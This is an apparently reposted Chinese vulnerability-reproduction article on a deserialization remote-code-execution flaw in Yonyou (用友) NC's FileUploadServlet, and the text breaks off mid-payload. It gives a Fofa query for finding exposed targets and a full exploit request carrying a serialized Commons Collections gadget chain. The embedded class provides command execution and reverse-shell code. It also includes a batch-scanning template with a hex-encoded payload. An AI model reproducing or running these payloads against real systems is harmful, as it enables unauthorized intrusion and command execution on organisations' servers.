用友NC FileUploadServlet 反序列化rce漏洞

admin

102755
文章

87
评论

2024年1月31日21:47:12评论61 views字数 31869阅读106分13秒阅读模式

用友NC FileUploadServlet 反序列化rce漏洞

漏洞简介

用友NC uploadservlet 存在反序列化rce漏洞。

漏洞复现

步骤一：在Fofa中搜索以下语法并随机确定要进行攻击测试的目标....

#Fofa搜索语法app="用友-UFIDA-NC"

步骤二：开启代理并打开yakit对其首页进行抓包拦截....修改请求头内容....在响应体中可以得到相对的响应内容

POST /servlet/~baseapp/nc.file.pub.imple.FileUploadServlet HTTP/1.1Host: your-ipCmd: whoamiAccept-Encoding: gzipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Length: 20434{{unquote("xacxedx00x05srx00x11java.util.HashSetxbaDx85x95x96xb8xb74x03x00x00xpwx0cx00x00x00x01?@x00x00x00x00x00x01srx004org.apache.commons.collections.keyvalue.TiedMapEntryx8axadxd2x9b9xc1x1fxdbx02x00x02Lx00x03keytx00x12Ljava/lang/Object;Lx00x03maptx00x0fLjava/util/Map;xptx00x03foosrx00*org.apache.commons.collections.map.LazyMapnxe5x94x82x9eyx10x94x03x00x01Lx00x07factorytx00,Lorg/apache/commons/collections/Transformer;xpsrx00:org.apache.commons.collections.functors.ChainedTransformer0xc7x97xecx28zx97x04x02x00x01[x00x0diTransformerstx00-[Lorg/apache/commons/collections/Transformer;xpurx00-[Lorg.apache.commons.collections.Transformer;xbdV*xf1xd84x18x99x02x00x00xpx00x00x00x07srx00;org.apache.commons.collections.functors.ConstantTransformerXvx90x11Ax02xb1x94x02x00x01Lx00x09iConstantqx00~x00x03xpvrx00*org.mozilla.javascript.DefiningClassLoaderx00x00x00x00x00x00x00x00x00x00x00xpsrx00:org.apache.commons.collections.functors.InvokerTransformerx87xe8xffkx7b|xce8x02x00x03[x00x05iArgstx00x13[Ljava/lang/Object;Lx00x0biMethodNametx00x12Ljava/lang/String;[x00x0biParamTypestx00x12[Ljava/lang/Class;xpurx00x13[Ljava.lang.Object;x90xceXx9fx10sx29lx02x00x00xpx00x00x00x01urx00x12[Ljava.lang.Class;xabx16xd7xaexcbxcdZx99x02x00x00xpx00x00x00x00tx00x16getDeclaredConstructoruqx00~x00x1ax00x00x00x01vqx00~x00x1asqx00~x00x13uqx00~x00x18x00x00x00x01uqx00~x00x18x00x00x00x00tx00x0bnewInstanceuqx00~x00x1ax00x00x00x01vqx00~x00x18sqx00~x00x13uqx00~x00x18x00x00x00x02tx00x02A4urx00x02[Bxacxf3x17xf8x06x08Txe0x02x00x00xpx00x00x1bxbbxcaxfexbaxbex00x00x001x01x9ax0ax00x1ex00xadx0ax00Cx00xaex0ax00Cx00xafx0ax00x1ex00xb0x08x00xb1x0ax00x1cx00xb2x0ax00xb3x00xb4x0ax00xb3x00xb5x07x00xb6x0ax00Cx00xb7x08x00xa5x0ax00!x00xb8x08x00xb9x08x00xbax07x00xbbx08x00xbcx08x00xbdx07x00xbex0ax00x1cx00xbfx08x00xc0x08x00xc1x07x00xc2x0bx00x16x00xc3x0bx00xc4x00xc5x0bx00xc4x00xc6x08x00xc7x08x00xc8x07x00xc9x0ax00x1cx00xcax07x00xcbx0ax00xccx00xcdx08x00xcex07x00xcfx08x00xd0x0ax00x8fx00xd1x0ax00!x00xd2x08x00xd3x09x00xd4x00xd5x0ax00xd4x00xd6x08x00xd7x0ax00x8fx00xd8x0ax00x1cx00xd9x08x00xdax07x00xdbx0ax00x1cx00xdcx08x00xddx07x00xdex08x00xdfx08x00xe0x0ax00x1cx00xe1x07x00xe2x0ax00Cx00xe3x0ax00xe4x00xd8x08x00xe5x0ax00!x00xe6x08x00xe7x0ax00!x00xe8x08x00xe9x0ax00!x00xeax0ax00x8fx00xebx08x00xecx0ax00!x00xedx08x00xeex09x00x8fx00xefx0ax00xd4x00xf0x09x00x8fx00xf1x07x00xf2x0ax00Cx00xf3x0ax00Cx00xf4x08x00xa6x08x00xf5x08x00xf6x0ax00x8fx00xf7x08x00xf8x0ax00x8fx00xf9x07x00xfax0ax00Lx00xfbx07x00xfcx0ax00Nx00xfdx0ax00x8fx00xfex0ax00Nx00xffx0ax00Nx01x00x0ax00Nx01x01x0ax00/x01x02x0ax00Lx01x03x0ax00!x01x04x08x01x05x0ax01x06x01x07x0ax00!x01x08x08x01x09x08x01x0ax08x01x0bx07x01x0cx0ax00]x00xadx0ax00]x01x0dx08x01x0ex0ax00]x01x02x08x01x0fx08x01x10x08x01x11x08x01x12x0ax01x13x01x14x0ax01x13x01x15x07x01x16x0ax01x17x01x18x0ax00hx01x19x08x01x1ax0ax00hx01x1bx0ax00hx00xc5x0ax00hx01x1cx0ax01x17x01x1dx0ax01x17x01x1ex08x01x1fx08x01 x0ax01x13x01!x07x01"x0ax00tx01#x0ax00tx01x18x0ax01x17x01$x0ax00tx01$x0ax00tx01%x0ax01&x01'x0ax01&x01x28x0ax01x29x01*x0ax01x29x01x00x05x00x00x00x00x00x00x002x0ax00Cx01+x0ax01x17x01,x0ax00tx01x01x08x01-x0ax00/x01.x08x01/x08x010x0ax00xd4x011x0ax00x8fx012x08x013x08x014x08x015x08x016x08x00xa9x08x017x07x018x01x00x0cBASE64_CHARSx01x00x12Ljava/lang/String;x01x00x0dConstantValuex08x019x01x00x02ipx01x00x04portx01x00x13Ljava/lang/Integer;x01x00x06<init>x01x00x03x28x29Vx01x00x04Codex01x00x0fLineNumberTablex01x00x0aExceptionsx01x00x09loadClassx01x00%x28Ljava/lang/String;x29Ljava/lang/Class;x01x00x09Signaturex01x00x28x28Ljava/lang/String;x29Ljava/lang/Class<*>;x01x00x05proxyx01x00&x28Ljava/lang/String;x29Ljava/lang/String;x01x00x05writex01x008x28Ljava/lang/String;Ljava/lang/String;x29Ljava/lang/String;x01x00x0aclearParamx01x00x04execx01x00x07reversex01x00'x28Ljava/lang/String;Ix29Ljava/lang/String;x01x00x03runx01x00x06decodex01x00x16x28Ljava/lang/String;x29[Bx01x00x0aSourceFilex01x00x07A4.javax0cx00x97x00x98x0cx01:x01;x0cx01<x01=x0cx01>x01?x01x00x07threadsx0cx01@x01Ax07x01Bx0cx01Cx01Dx0cx01Ex01Fx01x00x13[Ljava/lang/Thread;x0cx01Gx01Hx0cx01Ix01Jx01x00x04httpx01x00x06targetx01x00x12java/lang/Runnablex01x00x06this$0x01x00x07handlerx01x00x1ejava/lang/NoSuchFieldExceptionx0cx01Kx01?x01x00x06globalx01x00x0aprocessorsx01x00x0ejava/util/Listx0cx01Lx01Mx07x01Nx0cx01Ox01Px0cx01Qx01Rx01x00x03reqx01x00x0bgetResponsex01x00x0fjava/lang/Classx0cx01Sx01Tx01x00x10java/lang/Objectx07x01Ux0cx01Vx01Wx01x00x09getHeaderx01x00x10java/lang/Stringx01x00x03cmdx0cx00xa0x00xa1x0cx01Xx01Yx01x00x09setStatusx07x01Zx0cx01[x01\x0cx01]x01^x01x00$org.apache.tomcat.util.buf.ByteChunkx0cx00x9cx00x9dx0cx01_x01Rx01x00x08setBytesx01x00x02[Bx0cx01`x01Tx01x00x07doWritex01x00x13java/lang/Exceptionx01x00x13java.nio.ByteBufferx01x00x04wrapx0cx01ax00x9dx01x00 java/lang/ClassNotFoundExceptionx0cx01bx01cx07x01dx01x00x00x0cx01ex01fx01x00x10command not nullx0cx01gx01Hx01x00x05#####x0cx01hx01ix0cx00xa4x00xa1x01x00x01:x0cx01jx01kx01x00"command reverse host format error!x0cx00x94x00x91x0cx01lx01mx0cx00x95x00x96x01x00x10java/lang/Threadx0cx00x97x01nx0cx01ox00x98x01x00x05$$$$$x01x00x12file format error!x0cx00xa2x00xa3x01x00x05@@@@@x0cx00xa5x00xa1x01x00x0cjava/io/Filex0cx00x97x01px01x00x18java/io/FileOutputStreamx0cx00x97x01qx0cx00xa9x00xaax0cx00xa2x01rx0cx01sx00x98x0cx01tx00x98x0cx01ux01Hx0cx01vx01Hx0cx01wx01xx01x00x07os.namex07x01yx0cx01zx00xa1x0cx01x7bx01Hx01x00x03winx01x00x04pingx01x00x02-nx01x00x17java/lang/StringBuilderx0cx01|x01x7dx01x00x05 -n 4x01x00x02/cx01x00x05 -t 4x01x00x02shx01x00x02-cx07x01~x0cx01x7fx01x80x0cx00xa5x01x81x01x00x11java/util/Scannerx07x01x82x0cx01x83x01x84x0cx00x97x01x85x01x00x02\ax0cx01x86x01x87x0cx01Qx01Hx0cx01x88x01x84x0cx01x89x00x98x01x00x07/bin/shx01x00x07cmd.exex0cx00xa5x01x8ax01x00x0fjava/net/Socketx0cx00x97x01x8bx0cx01x8cx01x8dx0cx01x8ex01Px07x01x8fx0cx01x90x01x91x0cx01x92x01x91x07x01x93x0cx00xa2x01x94x0cx01x95x01x96x0cx01x97x01x91x01x00x1dreverse execute error, msg ->x0cx01x98x01Hx01x00x01!x01x00x13reverse execute ok!x0cx01x99x01x91x0cx00xa6x00xa7x01x00x16sun.misc.BASE64Decoderx01x00x0cdecodeBufferx01x00x10java.util.Base64x01x00x0agetDecoderx01x00&org.apache.commons.codec.binary.Base64x01x00x02A4x01x00@ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/x01x00x0dcurrentThreadx01x00x14x28x29Ljava/lang/Thread;x01x00x0egetThreadGroupx01x00x19x28x29Ljava/lang/ThreadGroup;x01x00x08getClassx01x00x13x28x29Ljava/lang/Class;x01x00x10getDeclaredFieldx01x00-x28Ljava/lang/String;x29Ljava/lang/reflect/Field;x01x00x17java/lang/reflect/Fieldx01x00x0dsetAccessiblex01x00x04x28Zx29Vx01x00x03getx01x00&x28Ljava/lang/Object;x29Ljava/lang/Object;x01x00x07getNamex01x00x14x28x29Ljava/lang/String;x01x00x08containsx01x00x1bx28Ljava/lang/CharSequence;x29Zx01x00x0dgetSuperclassx01x00x08iteratorx01x00x16x28x29Ljava/util/Iterator;x01x00x12java/util/Iteratorx01x00x07hasNextx01x00x03x28x29Zx01x00x04nextx01x00x14x28x29Ljava/lang/Object;x01x00x09getMethodx01x00@x28Ljava/lang/String;[Ljava/lang/Class;x29Ljava/lang/reflect/Method;x01x00x18java/lang/reflect/Methodx01x00x06invokex01x009x28Ljava/lang/Object;[Ljava/lang/Object;x29Ljava/lang/Object;x01x00x08getBytesx01x00x04x28x29[Bx01x00x11java/lang/Integerx01x00x04TYPEx01x00x11Ljava/lang/Class;x01x00x07valueOfx01x00x16x28Ix29Ljava/lang/Integer;x01x00x0bnewInstancex01x00x11getDeclaredMethodx01x00x07forNamex01x00x15getContextClassLoaderx01x00x19x28x29Ljava/lang/ClassLoader;x01x00x15java/lang/ClassLoaderx01x00x06equalsx01x00x15x28Ljava/lang/Object;x29Zx01x00x04trimx01x00x0astartsWithx01x00x15x28Ljava/lang/String;x29Zx01x00x05splitx01x00'x28Ljava/lang/String;x29[Ljava/lang/String;x01x00x08parseIntx01x00x15x28Ljava/lang/String;x29Ix01x00x17x28Ljava/lang/Runnable;x29Vx01x00x05startx01x00x15x28Ljava/lang/String;x29Vx01x00x11x28Ljava/io/File;x29Vx01x00x05x28[Bx29Vx01x00x05flushx01x00x05closex01x00x08toStringx01x00x0fgetAbsolutePathx01x00x07replacex01x00Dx28Ljava/lang/CharSequence;Ljava/lang/CharSequence;x29Ljava/lang/String;x01x00x10java/lang/Systemx01x00x0bgetPropertyx01x00x0btoLowerCasex01x00x06appendx01x00-x28Ljava/lang/String;x29Ljava/lang/StringBuilder;x01x00x11java/lang/Runtimex01x00x0agetRuntimex01x00x15x28x29Ljava/lang/Runtime;x01x00x28x28[Ljava/lang/String;x29Ljava/lang/Process;x01x00x11java/lang/Processx01x00x0egetInputStreamx01x00x17x28x29Ljava/io/InputStream;x01x00x18x28Ljava/io/InputStream;x29Vx01x00x0cuseDelimiterx01x00'x28Ljava/lang/String;x29Ljava/util/Scanner;x01x00x0egetErrorStreamx01x00x07destroyx01x00'x28Ljava/lang/String;x29Ljava/lang/Process;x01x00x16x28Ljava/lang/String;Ix29Vx01x00x0fgetOutputStreamx01x00x18x28x29Ljava/io/OutputStream;x01x00x08isClosedx01x00x13java/io/InputStreamx01x00x09availablex01x00x03x28x29Ix01x00x04readx01x00x14java/io/OutputStreamx01x00x04x28Ix29Vx01x00x05sleepx01x00x04x28Jx29Vx01x00x09exitValuex01x00x0agetMessagex01x00x08intValuex00!x00x8fx00x1ex00x01x00x0fx00x03x00x1ax00x90x00x91x00x01x00x92x00x00x00x02x00x93x00x02x00x94x00x91x00x00x00x02x00x95x00x96x00x00x00x09x00x01x00x97x00x98x00x02x00x99x00x00x03xb6x00x06x00x13x00x00x02x8e*xb7x00x01xb8x00x02xb6x00x03L+xb6x00x04x12x05xb6x00x06M,x04xb6x00x07,+xb6x00x08xc0x00x09xc0x00x09N-:x04x19x04xbe6x05x036x06x15x06x15x05xa2x02Xx19x04x15x062:x07x19x07xc7x00x06xa7x02Cx19x07xb6x00x0a:x08x19x08x12x0bxb6x00x0cx9ax00x0dx19x08x12x0dxb6x00x0cx9ax00x06xa7x02%x19x07xb6x00x04x12x0exb6x00x06M,x04xb6x00x07,x19x07xb6x00x08:x09x19x09xc1x00x0fx9ax00x06xa7x02x02x19x09xb6x00x04x12x10xb6x00x06M,x04xb6x00x07,x19x09xb6x00x08:x09x19x09xb6x00x04x12x11xb6x00x06Mxa7x00x16:x0ax19x09xb6x00x04xb6x00x13xb6x00x13x12x11xb6x00x06M,x04xb6x00x07,x19x09xb6x00x08:x09x19x09xb6x00x04xb6x00x13x12x14xb6x00x06Mxa7x00x10:x0ax19x09xb6x00x04x12x14xb6x00x06M,x04xb6x00x07,x19x09xb6x00x08:x09x19x09xb6x00x04x12x15xb6x00x06M,x04xb6x00x07,x19x09xb6x00x08xc0x00x16xc0x00x16:x0ax19x0axb9x00x17x01x00:x0bx19x0bxb9x00x18x01x00x99x01[x19x0bxb9x00x19x01x00:x0cx19x0cxb6x00x04x12x1axb6x00x06M,x04xb6x00x07,x19x0cxb6x00x08:x0dx19x0dxb6x00x04x12x1bx03xbdx00x1cxb6x00x1dx19x0dx03xbdx00x1exb6x00x1f:x0ex19x0dxb6x00x04x12 x04xbdx00x1cYx03x12!Sxb6x00x1dx19x0dx04xbdx00x1eYx03x12"Sxb6x00x1fxc0x00!:x0fx19x0fxc7x00x06xa7xffx91*x19x0fxb6x00#xb6x00$:x10x19x0exb6x00x04x12%x04xbdx00x1cYx03xb2x00&Sxb6x00x1dx19x0ex04xbdx00x1eYx03x11x00xc8xb8x00'Sxb6x00x1fW*x12x28xb6x00x29:x11x19x11xb6x00*:x09x19x11x12+x06xbdx00x1cYx03x12,SYx04xb2x00&SYx05xb2x00&Sxb6x00-x19x09x06xbdx00x1eYx03x19x10SYx04x03xb8x00'SYx05x19x10xbexb8x00'Sxb6x00x1fWx19x0exb6x00x04x12.x04xbdx00x1cYx03x19x11Sxb6x00x1dx19x0ex04xbdx00x1eYx03x19x09Sxb6x00x1fWxa7x00O:x11*x120xb6x00x29:x12x19x12x121x04xbdx00x1cYx03x12,Sxb6x00-x19x12x04xbdx00x1eYx03x19x10Sxb6x00x1f:x09x19x0exb6x00x04x12.x04xbdx00x1cYx03x19x12Sxb6x00x1dx19x0ex04xbdx00x1eYx03x19x09Sxb6x00x1fWxa7x00x0exa7x00x05:x08x84x06x01xa7xfdxa7xb1x00x07x00xa0x00xabx00xaex00x12x00xcex00xdcx00xdfx00x12x01xc4x020x023x00/x00?x00Dx02x85x00/x00Gx00bx02x85x00/x00ex00x85x02x85x00/x00x88x02x7fx02x85x00/x00x01x00x9ax00x00x00xdex007x00x00x00x17x00x04x00x18x00x0bx00x19x00x15x00x1ax00x1ax00x1bx00&x00x1dx00?x00x1fx00Gx00 x00Nx00!x00ex00"x00px00#x00ux00$x00x7dx00%x00x88x00&x00x93x00'x00x98x00x28x00xa0x00*x00xabx00-x00xaex00+x00xb0x00,x00xc1x00.x00xc6x00/x00xcex001x00xdcx004x00xdfx002x00xe1x003x00xecx005x00xf1x006x00xf9x007x01x04x008x01x09x009x01x17x00:x013x00;x01>x00<x01Cx00=x01Kx00>x01dx00?x01x8ax00@x01x8fx00Ax01x92x00Cx01x9dx00Dx01xc4x00Fx01xccx00Gx01xd3x00Hx02x0ex00Ix020x00Nx023x00Jx025x00Kx02=x00Lx02]x00Mx02x7fx00Ox02x82x00Sx02x85x00Qx02x87x00x1dx02x8dx00Ux00x9bx00x00x00x04x00x01x00/x00x01x00x9cx00x9dx00x03x00x99x00x00x009x00x02x00x03x00x00x00x11+xb8x002xb0Mxb8x00x02xb6x004+xb6x005xb0x00x01x00x00x00x04x00x05x003x00x01x00x9ax00x00x00x0ex00x03x00x00x00_x00x05x00`x00x06x00ax00x9bx00x00x00x04x00x01x003x00x9ex00x00x00x02x00x9fx00x01x00xa0x00xa1x00x01x00x99x00x00x00xffx00x04x00x04x00x00x00x9b+xc6x00x0cx126+xb6x007x99x00x06x128xb0+xb6x009L+x12:xb6x00;x99x00;*+xb7x00<x12=xb6x00>M,xbex05x9fx00x06x12?xb0*,x032xb5x00@*,x042xb8x00Axb8x00'xb5x00Bxbbx00CY*xb7x00DN-xb6x00Ex12Fxb0+x12Gxb6x00;x99x00"*+xb7x00<x12=xb6x00>M,xbex05x9fx00x06x12Hxb0*,x032,x042xb6x00Ixb0+x12Jxb6x00;x99x00x0d**+xb7x00<xb6x00Kxb0**+xb7x00<xb6x00Kxb0x00x00x00x01x00x9ax00x00x00Rx00x14x00x00x00kx00x0dx00lx00x10x00nx00x15x00ox00x1ex00qx00x29x00rx00/x00sx002x00ux009x00vx00Fx00wx00Ox00xx00Sx00yx00Vx00zx00_x00x7bx00jx00|x00px00x7dx00sx00x7fx00~x00x80x00x87x00x81x00x91x00x83x00x01x00xa2x00xa3x00x01x00x99x00x00x00vx00x03x00x05x00x00x006xbbx00LY+xb7x00MNxbbx00NY-xb7x00O:x04x19x04,xb8x00Pxb6x00Qx19x04xb6x00Rx19x04xb6x00Sxa7x00x0b:x04x19x04xb6x00Txb0-xb6x00Uxb0x00x01x00x09x00&x00x29x00/x00x01x00x9ax00x00x00&x00x09x00x00x00x8ex00x09x00x90x00x13x00x91x00x1cx00x92x00!x00x93x00&x00x96x00x29x00x94x00+x00x95x001x00x97x00x02x00xa4x00xa1x00x01x00x99x00x00x00/x00x03x00x02x00x00x00x17+x12:x126xb6x00Vx12Jx126xb6x00Vx12Gx126xb6x00Vxb0x00x00x00x01x00x9ax00x00x00x06x00x01x00x00x00xa0x00x01x00xa5x00xa1x00x01x00x99x00x00x01xc3x00x04x00x09x00x00x01'x12Wxb8x00Xxb6x00YM+xb6x009Lx01N,x12Zxb6x00x0cx99x00@+x12[xb6x00x0cx99x00 +x12\xb6x00x0cx9ax00x17xbbx00]Yxb7x00^+xb6x00_x12`xb6x00_xb6x00aLx06xbdx00!Yx03x12"SYx04x12bSYx05+S:x04xa7x00=+x12[xb6x00x0cx99x00 +x12\xb6x00x0cx9ax00x17xbbx00]Yxb7x00^+xb6x00_x12cxb6x00_xb6x00aLx06xbdx00!Yx03x12dSYx04x12eSYx05+S:x04xb8x00fx19x04xb6x00gNxbbx00hY-xb6x00ixb7x00jx12kxb6x00l:x05x19x05xb6x00mx99x00x0bx19x05xb6x00nxa7x00x05x126:x06xbbx00hY-xb6x00oxb7x00jx12kxb6x00l:x05xbbx00]Yxb7x00^x19x06xb6x00_x19x05xb6x00mx99x00x0bx19x05xb6x00nxa7x00x05x126xb6x00_xb6x00a:x06x19x06:x07-xc6x00x07-xb6x00px19x07xb0:x05x19x05xb6x00T:x06-xc6x00x07-xb6x00px19x06xb0:x08-xc6x00x07-xb6x00px19x08xbfx00x04x00x90x00xfbx01x06x00/x00x90x00xfbx01x1ax00x00x01x06x01x0fx01x1ax00x00x01x1ax01x1cx01x1ax00x00x00x01x00x9ax00x00x00jx00x1ax00x00x00xa9x00x09x00xaax00x0ex00xabx00x10x00xadx00x19x00xaex00+x00xafx00?x00xb1x00Vx00xb3x00hx00xb4x00|x00xb6x00x90x00xb9x00x99x00xbax00xabx00xbbx00xbfx00xbcx00xd1x00xbdx00xf7x00xbex00xfbx00xc2x00xffx00xc3x01x03x00xbex01x06x00xbfx01x08x00xc0x01x0fx00xc2x01x13x00xc3x01x17x00xc0x01x1ax00xc2x01 x00xc3x00x01x00xa6x00xa7x00x01x00x99x00x00x01rx00x04x00x0cx00x00x00xe2x12Wxb8x00Xxb6x00Yx12Zxb6x00x0cx9ax00x09x12qNxa7x00x06x12rNxb8x00f-xb6x00s:x04xbbx00tY+x1cxb7x00u:x05x19x04xb6x00i:x06x19x04xb6x00o:x07x19x05xb6x00v:x08x19x04xb6x00w:x09x19x05xb6x00x:x0ax19x05xb6x00yx9ax00`x19x06xb6x00zx9ex00x10x19x0ax19x06xb6x00x7bxb6x00|xa7xffxeex19x07xb6x00zx9ex00x10x19x0ax19x07xb6x00x7bxb6x00|xa7xffxeex19x08xb6x00zx9ex00x10x19x09x19x08xb6x00x7bxb6x00|xa7xffxeex19x0axb6x00x7dx19x09xb6x00x7dx14x00~xb8x00x80x19x04xb6x00x81Wxa7x00x08:x0bxa7xffx9ex19x04xb6x00px19x05xb6x00x82xa7x00 Nxbbx00]Yxb7x00^x12x83xb6x00_-xb6x00x84xb6x00_x12x85xb6x00_xb6x00axb0x12x86xb0x00x02x00xa7x00xadx00xb0x00/x00x00x00xbfx00xc2x00/x00x01x00x9ax00x00x00nx00x1bx00x00x00xd1x00x10x00xd2x00x16x00xd4x00x19x00xd6x00"x00xd7x00-x00xd8x00Bx00xd9x00Px00xdax00Xx00xdbx00`x00xdcx00mx00xdex00ux00xdfx00x82x00xe1x00x8ax00xe2x00x97x00xe4x00x9cx00xe5x00xa1x00xe6x00xa7x00xe8x00xadx00xe9x00xb0x00xeax00xb2x00xebx00xb5x00xedx00xbax00xeex00xbfx00xf1x00xc2x00xefx00xc3x00xf0x00xdfx00xf2x00x01x00xa8x00x98x00x01x00x99x00x00x00-x00x03x00x01x00x00x00x11**xb4x00@*xb4x00Bxb6x00x87xb6x00x88Wxb1x00x00x00x01x00x9ax00x00x00x0ax00x02x00x00x00xf7x00x10x00xf8x00x09x00xa9x00xaax00x01x00x99x00x00x01x1cx00x06x00x04x00x00x00xacx01Lx12x89xb8x002M,x12x8ax04xbdx00x1cYx03x12!Sxb6x00x1d,xb6x00*x04xbdx00x1eYx03*Sxb6x00x1fxc0x00,xc0x00,Lxa7x00x04M+xc7x00Cx12x8bxb8x002x12x8cx03xbdx00x1cxb6x00x1dx01x03xbdx00x1exb6x00x1fM,xb6x00x04x12x8dx04xbdx00x1cYx03x12!Sxb6x00x1d,x04xbdx00x1eYx03*Sxb6x00x1fxc0x00,xc0x00,Lxa7x00x04M+xc7x004x12x8exb8x002M,x12x8dx04xbdx00x1cYx03x12!Sxb6x00x1dN-,xb6x00*x04xbdx00x1eYx03*Sxb6x00x1fxc0x00,xc0x00,Lxa7x00x04M+xb0x00x03x00x02x00-x000x00/x005x00qx00tx00/x00yx00xa6x00xa9x00/x00x01x00x9ax00x00x00Fx00x11x00x00x01x00x00x02x01x02x00x08x01x03x00-x01x06x000x01x04x001x01x07x005x01x09x00Lx01x0ax00qx01x0dx00tx01x0bx00ux01x0fx00yx01x11x00x7fx01x12x00x8fx01x13x00xa6x01x16x00xa9x01x14x00xaax01x18x00x01x00xabx00x00x00x02x00xactx00x0bdefineClassuqx00~x00x1ax00x00x00x02vrx00x10java.lang.Stringxa0xf0xa48z;xb3Bx02x00x00xpvqx00~x00x28sqx00~x00x13uqx00~x00x18x00x00x00x01uqx00~x00x1ax00x00x00x00qx00~x00x1cuqx00~x00x1ax00x00x00x01qx00~x00x1esqx00~x00x13uqx00~x00x18x00x00x00x01uqx00~x00x18x00x00x00x00qx00~x00"uqx00~x00x1ax00x00x00x01qx00~x00$sqx00~x00x0fsqx00~x00x00wx0cx00x00x00x00?@x00x00x00x00x00x00xsrx00x11java.util.HashMapx05x07xdaxc1xc3x16`xd1x03x00x02Fx00x0aloadFactorIx00x09thresholdxp?@x00x00x00x00x00x10wx08x00x00x00x10x00x00x00x00xxx")}}

批量脚本

id: yonyon-nc-uploadservlet-rceinfo:  name: yonyon-nc-uploadservlet-rce  author: unknow  severity: critical  description: 用友NC uploadservlet 存在反序列化rce漏洞。  tags: yonyon,rce  metadata:    fofa-query: app="用友-UFIDA-NC"http:  - raw:      - |        POST /servlet/~baseapp/nc.document.pub.fileSystem.servlet.UploadServlet HTTP/1.1        Host:         Cmd: {{rce}}        User-Agent: Mozilla/5.0         {{hex_decode("aced0005737200116a6176612e7574696c2e48617368536574ba44859596b8b7340300007870770c000000013f40000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000077372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e000378707672002a6f72672e6d6f7a696c6c612e6a6176617363726970742e446566696e696e67436c6173734c6f61646572000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c020000787000000001757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400166765744465636c61726564436f6e7374727563746f727571007e001a000000017671007e001a7371007e00137571007e0018000000017571007e00180000000074000b6e6577496e7374616e63657571007e001a000000017671007e00187371007e00137571007e0018000000027400024134757200025b42acf317f8060854e0020000787000001751cafebabe00000031016b0a001d00920a004400930a004400940a001d00950800960a001b00970a009800990a0098009a07009b0a0044009c08008c0a0020009d08009e08009f0700a00800a10800a20700a30a001b00a40800a50800a60700a70b001600a80b001600a90800aa0800ab0700ac0a001b00ad0700ae0a00af00b00800b10700b20800b30a007e00b40a002000b50800b609002600b70700b80a002600b90800ba0a007e00bb0a001b00bc0800bd0700be0a001b00bf0800c00700c10800c20800c30a001b00c40700c50a004400c60a00c700bb0800c80a002000c90800ca0a002000cb0800cc0a002000cd0a002000ce0800cf0a002000d00800d109007e00d20a002600d30a002600d409007e00d50700d60a004400d70a004400d808008d0800d90a007e00da0800db0a00dc00dd0a002000de0800df0800e00800e10700e20a005000920a005000e30800e40a005000e50800e60800e70800e80800e90a00ea00eb0a00ea00ec0700ed0a00ee00ef0a005b00f00800f10a005b00f20a005b00f30a005b00f40a00ee00f50a00ee00f60a002f00e50800f70a002000f80800f90a00ea00fa0700fb0a002600fc0a006900fd0a006900ef0a00ee00fe0a006900fe0a006900ff0a010001010a010001020a010301040a010301050500000000000000320a004401060a00ee01070a006901080801090a002f010a08010b08010c0a007e010d07010e01000269700100124c6a6176612f6c616e672f537472696e673b010004706f72740100134c6a6176612f6c616e672f496e74656765723b0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c6501000a457863657074696f6e730100096c6f6164436c617373010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b01000765786563757465010026284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e673b0100046578656301000772657665727365010039284c6a6176612f6c616e672f537472696e673b4c6a6176612f6c616e672f496e74656765723b294c6a6176612f6c616e672f537472696e673b01000372756e01000a536f7572636546696c6501000741342e6a6176610c008300840c010f01100c011101120c01130114010007746872656164730c011501160701170c011801190c011a011b0100135b4c6a6176612f6c616e672f5468726561643b0c011c011d0c011e011f010004687474700100067461726765740100126a6176612f6c616e672f52756e6e61626c6501000674686973243001000768616e646c657201001e6a6176612f6c616e672f4e6f537563684669656c64457863657074696f6e0c01200114010006676c6f62616c01000a70726f636573736f727301000e6a6176612f7574696c2f4c6973740c012101220c011a012301000372657101000b676574526573706f6e736501000f6a6176612f6c616e672f436c6173730c012401250100106a6176612f6c616e672f4f626a6563740701260c012701280100096765744865616465720100106a6176612f6c616e672f537472696e67010003636d640c008a008b0c0129012a0100097365745374617475730c012b012c0100116a6176612f6c616e672f496e74656765720c0083012d0100246f72672e6170616368652e746f6d6361742e7574696c2e6275662e427974654368756e6b0c008800890c012e012f01000873657442797465730100025b420c01300125010007646f57726974650100136a6176612f6c616e672f457863657074696f6e0100136a6176612e6e696f2e42797465427566666572010004777261700c013100890100206a6176612f6c616e672f436c6173734e6f74466f756e64457863657074696f6e0c013201330701340100000c01350136010010636f6d6d616e64206e6f74206e756c6c0c0137011d01000523232323230c013801390c013a013b0100013a0c013c013d010022636f6d6d616e64207265766572736520686f737420666f